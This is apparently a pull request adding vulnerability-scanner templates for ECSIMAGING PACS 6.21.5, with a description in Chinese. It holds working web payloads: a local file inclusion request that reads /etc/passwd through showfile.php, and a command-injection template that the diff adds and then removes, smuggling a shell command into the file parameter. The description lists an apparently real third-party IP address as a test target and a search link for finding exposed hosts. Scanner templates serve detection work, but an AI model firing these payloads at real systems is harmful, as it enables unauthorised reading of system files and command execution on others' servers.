### PR TITLE
ECSIMAGING PACS 6.21.5 - LFI

### DIFF
--- a/pocs/ecsimagingpacs-lfi.yml
+++ b/pocs/ecsimagingpacs-lfi.yml
@@ -1,0 +1,8 @@
+name: poc-yaml-ecsimagingpacs-lfi
+rules:
+  - method: GET
+    path: /showfile.php?file=/etc/passwd
+    follow_redirects: false
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+

--- a/pocs/ecsimagingpacs-rce.yml
+++ b/pocs/ecsimagingpacs-rce.yml
@@ -1,0 +1,9 @@
+name: poc-yaml-ecsimagingpacs-rce
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    path: /showfile.php?file=|expr$IFS"{{r1}}"$IFS-$IFS"{{r2}}"
+    follow_redirects: false
+    expression: response.body.bcontains(bytes(string(r1-r2)))

--- a/pocs/ecsimagingpacs-rce.yml
+++ b/pocs/ecsimagingpacs-rce.yml
@@ -1,9 +1,0 @@
-name: poc-yaml-ecsimagingpacs-rce
-set:
-  r1: randomInt(800000000, 1000000000)
-  r2: randomInt(800000000, 1000000000)
-rules:
-  - method: GET
-    path: /showfile.php?file=|expr$IFS"{{r1}}"$IFS-$IFS"{{r2}}"
-    follow_redirects: false
-    expression: response.body.bcontains(bytes(string(r1-r2)))


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
ECSIMAGING PACS 6.21.5 - LFI
## 测试环境
https://fofa.so/result?qbase64=InJlcV9wYXNzd29yZF91c2VyLnBocCI%3D
https://82.113.20.136
## 备注
影响版本：
Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
来源：
https://cn.0day.today/exploit/35628